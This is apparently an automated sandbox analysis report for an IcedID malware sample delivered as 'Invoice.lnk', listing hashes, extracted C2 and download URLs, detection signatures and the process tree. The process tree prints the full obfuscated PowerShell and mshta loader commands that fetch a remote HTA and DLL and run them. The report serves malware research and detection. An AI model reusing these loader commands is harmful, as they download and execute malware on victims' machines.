Analysis
-
max time kernel
40s -
max time network
43s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
06-07-2022 18:01
Static task
static1
Behavioral task
behavioral1
Sample
Invoice.lnk
Resource
win7-20220414-en
General
-
Target
Invoice.lnk
-
Size
178KB
-
MD5
c29d6fc092698aafe01ece64da57254f
-
SHA1
523e8303f8d6853ef499b742ef5e9d7485803a88
-
SHA256
d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae
-
SHA512
fa37a95c3eb1256bea25cc19f84de5de77f24a38938e062a08fab2073a8cc9ca480fa58fc90103f0e298958605866b1ec192971099dcaca4966bd134ac243e50
Malware Config
Extracted
http://comradespoon.com/5h.hta
Extracted
icedid
1487191074
vneastruzz.com
Signatures
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 4 1596 mshta.exe 5 1512 powershell.exe 7 1896 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 4 IoCs
Processes:
rundll32.exepid process 1896 rundll32.exe 1896 rundll32.exe 1896 rundll32.exe 1896 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exerundll32.exepid process 1308 powershell.exe 1512 powershell.exe 1896 rundll32.exe 1896 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exemshta.exepowershell.exedescription pid process target process PID 1464 wrote to memory of 1308 1464 cmd.exe powershell.exe PID 1464 wrote to memory of 1308 1464 cmd.exe powershell.exe PID 1464 wrote to memory of 1308 1464 cmd.exe powershell.exe PID 1308 wrote to memory of 1596 1308 powershell.exe mshta.exe PID 1308 wrote to memory of 1596 1308 powershell.exe mshta.exe PID 1308 wrote to memory of 1596 1308 powershell.exe mshta.exe PID 1596 wrote to memory of 1512 1596 mshta.exe powershell.exe PID 1596 wrote to memory of 1512 1596 mshta.exe powershell.exe PID 1596 wrote to memory of 1512 1596 mshta.exe powershell.exe PID 1512 wrote to memory of 1896 1512 powershell.exe rundll32.exe PID 1512 wrote to memory of 1896 1512 powershell.exe rundll32.exe PID 1512 wrote to memory of 1896 1512 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://comradespoon.com/5h.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lpasD($HADYWKdP, $JQNbwy){[IO.File]::WriteAllBytes($HADYWKdP, $JQNbwy)};function UrOfCPrL($HADYWKdP){if($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65487,65495,65495))) -eq $True){Start-Process (qQtFjAStmmZUquwlKa @(rundll32.exe $HADYWKdP ,PluginInit ))}elseif($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65499,65502,65436))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $HADYWKdP}else{Start-Process $HADYWKdP}};function iaeLEXNRYglRNM($lpasD){$ssPVUzIfuhNMPpFbC=(qQtFjAStmmZUquwlKa @(65459,65492,65487,65487,65488,65497));$uAbUQLrXxwt=(Get-ChildItem $lpasD -Force);$uAbUQLrXxwt.Attributes=$uAbUQLrXxwt.Attributes -bor ([IO.FileAttributes]$ssPVUzIfuhNMPpFbC).value__};function BRrXupXAZjXJXcLwJn($fRadwPdaCcH){$ZudUcOaTTWDij = New-Object (qQtFjAStmmZUquwlKa @(65465,65488,65503,65433,65474,65488,65485,65454,65495,65492,65488,65497,65503));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JQNbwy = $ZudUcOaTTWDij.DownloadData($fRadwPdaCcH);return $JQNbwy};function qQtFjAStmmZUquwlKa($aiWdOwItl){$JGtzYUbtTnusApt=65387;$ouOlcqQbirCOt=$Null;foreach($ALFUNolW in $aiWdOwItl){$ouOlcqQbirCOt+=[char]($ALFUNolW-$JGtzYUbtTnusApt)};return $ouOlcqQbirCOt};function bdpFrZCPoqatcoUiW(){$QuseLIVGitH = $env:ProgramData + '\';$LbGea = $QuseLIVGitH + '1.dll'; if (Test-Path -Path $LbGea){UrOfCPrL $LbGea;}Else{ $oGMWxNZW = BRrXupXAZjXJXcLwJn (qQtFjAStmmZUquwlKa @(65491,65503,65503,65499,65445,65434,65434,65486,65498,65496,65501,65484,65487,65488,65502,65499,65498,65498,65497,65433,65486,65498,65496,65434,65436,65433,65487,65495,65495));lpasD $LbGea $oGMWxNZW;UrOfCPrL $LbGea;};iaeLEXNRYglRNM $LbGea;;;;;}bdpFrZCPoqatcoUiW;4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1896
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
813KB
MD535999cd6417ae33f264178adb800d560
SHA174276d57902e683fbcddb313cb34b0f92bcb52df
SHA2561431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710
SHA51278ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d
-
Filesize
813KB
MD535999cd6417ae33f264178adb800d560
SHA174276d57902e683fbcddb313cb34b0f92bcb52df
SHA2561431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710
SHA51278ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d
-
Filesize
813KB
MD535999cd6417ae33f264178adb800d560
SHA174276d57902e683fbcddb313cb34b0f92bcb52df
SHA2561431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710
SHA51278ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d
-
Filesize
813KB
MD535999cd6417ae33f264178adb800d560
SHA174276d57902e683fbcddb313cb34b0f92bcb52df
SHA2561431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710
SHA51278ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d
-
Filesize
813KB
MD535999cd6417ae33f264178adb800d560
SHA174276d57902e683fbcddb313cb34b0f92bcb52df
SHA2561431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710
SHA51278ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d